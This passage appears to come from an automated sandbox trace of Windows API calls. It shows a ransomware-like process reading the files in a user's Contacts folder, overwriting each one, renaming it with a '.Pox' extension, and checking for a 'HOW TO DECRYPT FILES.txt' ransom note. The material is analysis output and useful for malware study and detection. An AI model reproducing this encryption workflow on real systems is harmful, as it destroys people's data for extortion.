dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0038.300] GetFileType (hFile=0x26c) returned 0x1 [0038.300] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4b8) returned 1 [0038.300] GetFileType (hFile=0x26c) returned 0x1 [0038.300] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae5c4 | out: lpFileSizeHigh=0x3ae5c4*=0x0) returned 0x16b [0038.300] ReadFile (in: hFile=0x26c, lpBuffer=0x2520408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x3ae570, lpOverlapped=0x0 | out: lpBuffer=0x2520408*, lpNumberOfBytesRead=0x3ae570*=0x16b, lpOverlapped=0x0) returned 1 [0038.301] CloseHandle (hObject=0x26c) returned 1 [0038.315] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3ae0dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0038.315] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae53c) returned 1 [0038.315] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae5b8 | out: lpFileInformation=0x3ae5b8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0038.315] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae538) returned 1 [0038.315] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk", nBufferLength=0x105, lpBuffer=0x3adfb4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk", lpFilePart=0x0) returned 0x34 [0038.315] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4a8) returned 1 [0038.315] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\recentplaces.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0038.316] GetFileType (hFile=0x26c) returned 0x1 [0038.316] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4a4) returned 1 [0038.316] GetFileType (hFile=0x26c) returned 0x1 [0038.316] WriteFile (in: hFile=0x26c, lpBuffer=0x256ebd4*, nNumberOfBytesToWrite=0x170, lpNumberOfBytesWritten=0x3ae538, lpOverlapped=0x0 | out: lpBuffer=0x256ebd4*, lpNumberOfBytesWritten=0x3ae538*=0x170, lpOverlapped=0x0) returned 1 [0038.317] CloseHandle (hObject=0x26c) returned 1 [0038.318] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk", nBufferLength=0x105, lpBuffer=0x3ae0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk", lpFilePart=0x0) returned 0x34 [0038.318] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk.Pox", nBufferLength=0x105, lpBuffer=0x3ae0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk.Pox", lpFilePart=0x0) returned 0x38 [0038.318] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae548) returned 1 [0038.318] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\recentplaces.lnk"), fInfoLevelId=0x0, lpFileInformation=0x3ae5c4 | out: lpFileInformation=0x3ae5c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2906e240, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x170)) returned 1 [0038.318] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae544) returned 1 [0038.318] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\recentplaces.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\recentplaces.lnk.pox")) returned 1 [0038.319] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae618) returned 1 [0038.319] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts", nBufferLength=0x105, lpBuffer=0x3ae120, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts", lpFilePart=0x0) returned 0x26 [0038.319] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", nBufferLength=0x105, lpBuffer=0x3ae0f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpFilePart=0x0) returned 0x27 [0038.319] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*", lpFindFileData=0x3ae340 | out: lpFindFileData=0x3ae340*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x406148 [0038.319] FindNextFileW (in: hFindFile=0x406148, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0038.319] FindNextFileW (in: hFindFile=0x406148, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ea7ef20, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2ea7ef20, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2ea7ef20, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x49a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Aclviho ASldjfl.contact", cAlternateFileName="ACLVIH~1.CON")) returned 1 [0038.319] FindNextFileW (in: hFindFile=0x406148, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf0fefd94, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x10b1e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Administrator.contact", cAlternateFileName="ADMINI~1.CON")) returned 1 [0038.320] FindNextFileW (in: hFindFile=0x406148, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaa5080, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaa5080, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaa5080, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x493, dwReserved0=0x0, dwReserved1=0x0, cFileName="asdlfk poopvy.contact", cAlternateFileName="ASDLFK~1.CON")) returned 1 [0038.320] FindNextFileW (in: hFindFile=0x406148, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eacb1e0, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eacb1e0, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eacb1e0, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x499, dwReserved0=0x0, dwReserved1=0x0, cFileName="chucu jadnvk.contact", cAlternateFileName="CHUCUJ~1.CON")) returned 1 [0038.320] FindNextFileW (in: hFindFile=0x406148, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0038.320] FindNextFileW (in: hFindFile=0x406148, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x496, dwReserved0=0x0, dwReserved1=0x0, cFileName="lulcit amkdfe.contact", cAlternateFileName="LULCIT~1.CON")) returned 1 [0038.320] FindNextFileW (in: hFindFile=0x406148, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x494, dwReserved0=0x0, dwReserved1=0x0, cFileName="sikvnb huvuib.contact", cAlternateFileName="SIKVNB~1.CON")) returned 1 [0038.320] FindNextFileW (in: hFindFile=0x406148, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0038.320] FindClose (in: hFindFile=0x406148 | out: hFindFile=0x406148) returned 1 [0038.320] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae5d8) returned 1 [0038.320] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae5e4) returned 1 [0038.321] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae618) returned 1 [0038.321] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts", nBufferLength=0x105, lpBuffer=0x3ae120, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts", lpFilePart=0x0) returned 0x26 [0038.321] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", nBufferLength=0x105, lpBuffer=0x3ae0f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpFilePart=0x0) returned 0x27 [0038.321] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*", lpFindFileData=0x3ae340 | out: lpFindFileData=0x3ae340*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x406148 [0038.321] FindNextFileW (in: hFindFile=0x406148, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0038.321] FindNextFileW (in: hFindFile=0x406148, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ea7ef20, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2ea7ef20, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2ea7ef20, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x49a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Aclviho ASldjfl.contact", cAlternateFileName="ACLVIH~1.CON")) returned 1 [0038.321] FindNextFileW (in: hFindFile=0x406148, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf0fefd94, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x10b1e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Administrator.contact", cAlternateFileName="ADMINI~1.CON")) returned 1 [0038.321] FindNextFileW (in: hFindFile=0x406148, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaa5080, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaa5080, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaa5080, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x493, dwReserved0=0x0, dwReserved1=0x0, cFileName="asdlfk poopvy.contact", cAlternateFileName="ASDLFK~1.CON")) returned 1 [0038.322] FindNextFileW (in: hFindFile=0x406148, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eacb1e0, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eacb1e0, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eacb1e0, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x499, dwReserved0=0x0, dwReserved1=0x0, cFileName="chucu jadnvk.contact", cAlternateFileName="CHUCUJ~1.CON")) returned 1 [0038.322] FindNextFileW (in: hFindFile=0x406148, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0038.322] FindNextFileW (in: hFindFile=0x406148, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x496, dwReserved0=0x0, dwReserved1=0x0, cFileName="lulcit amkdfe.contact", cAlternateFileName="LULCIT~1.CON")) returned 1 [0038.322] FindNextFileW (in: hFindFile=0x406148, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x494, dwReserved0=0x0, dwReserved1=0x0, cFileName="sikvnb huvuib.contact", cAlternateFileName="SIKVNB~1.CON")) returned 1 [0038.322] FindNextFileW (in: hFindFile=0x406148, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x494, dwReserved0=0x0, dwReserved1=0x0, cFileName="sikvnb huvuib.contact", cAlternateFileName="SIKVNB~1.CON")) returned 0 [0038.322] FindClose (in: hFindFile=0x406148 | out: hFindFile=0x406148) returned 1 [0038.322] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae5d8) returned 1 [0038.322] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae5e4) returned 1 [0038.322] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact", nBufferLength=0x105, lpBuffer=0x3adfc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact", lpFilePart=0x0) returned 0x3e [0038.323] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4bc) returned 1 [0038.323] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0038.327] GetFileType (hFile=0x26c) returned 0x1 [0038.327] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4b8) returned 1 [0038.327] GetFileType (hFile=0x26c) returned 0x1 [0038.327] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae5c4 | out: lpFileSizeHigh=0x3ae5c4*=0x0) returned 0x49a [0038.327] ReadFile (in: hFile=0x26c, lpBuffer=0x25729d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x3ae570, lpOverlapped=0x0 | out: lpBuffer=0x25729d8*, lpNumberOfBytesRead=0x3ae570*=0x49a, lpOverlapped=0x0) returned 1 [0038.328] CloseHandle (hObject=0x26c) returned 1 [0038.393] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3ae0dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0038.393] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae53c) returned 1 [0038.393] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae5b8 | out: lpFileInformation=0x3ae5b8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0038.393] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae538) returned 1 [0038.393] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact", nBufferLength=0x105, lpBuffer=0x3adfb4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact", lpFilePart=0x0) returned 0x3e [0038.393] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4a8) returned 1 [0038.393] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0038.394] GetFileType (hFile=0x26c) returned 0x1 [0038.394] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4a4) returned 1 [0038.394] GetFileType (hFile=0x26c) returned 0x1 [0038.394] WriteFile (in: hFile=0x26c, lpBuffer=0x23c31dc*, nNumberOfBytesToWrite=0x4a0, lpNumberOfBytesWritten=0x3ae538, lpOverlapped=0x0 | out: lpBuffer=0x23c31dc*, lpNumberOfBytesWritten=0x3ae538*=0x4a0, lpOverlapped=0x0) returned 1 [0038.395] CloseHandle (hObject=0x26c) returned 1 [0038.547] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact", nBufferLength=0x105, lpBuffer=0x3ae0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact", lpFilePart=0x0) returned 0x3e [0038.547] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact.Pox", nBufferLength=0x105, lpBuffer=0x3ae0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact.Pox", lpFilePart=0x0) returned 0x42 [0038.547] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae548) returned 1 [0038.547] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact"), fInfoLevelId=0x0, lpFileInformation=0x3ae5c4 | out: lpFileInformation=0x3ae5c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ea7ef20, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2ea7ef20, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x29283580, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x4a0)) returned 1 [0038.547] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae544) returned 1 [0038.547] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact.pox")) returned 1 [0038.548] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact", nBufferLength=0x105, lpBuffer=0x3adfc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact", lpFilePart=0x0) returned 0x3c [0038.548] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4bc) returned 1 [0038.548] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0038.548] GetFileType (hFile=0x26c) returned 0x1 [0038.548] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4b8) returned 1 [0038.548] GetFileType (hFile=0x26c) returned 0x1 [0038.548] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae5c4 | out: lpFileSizeHigh=0x3ae5c4*=0x0) returned 0x10b1e [0038.548] ReadFile (in: hFile=0x26c, lpBuffer=0x23c44d8, nNumberOfBytesToRead=0x10b1e, lpNumberOfBytesRead=0x3ae570, lpOverlapped=0x0 | out: lpBuffer=0x23c44d8*, lpNumberOfBytesRead=0x3ae570*=0x10b1e, lpOverlapped=0x0) returned 1 [0038.550] CloseHandle (hObject=0x26c) returned 1 [0038.566] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3ae0dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0038.566] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae53c) returned 1 [0038.566] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae5b8 | out: lpFileInformation=0x3ae5b8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, 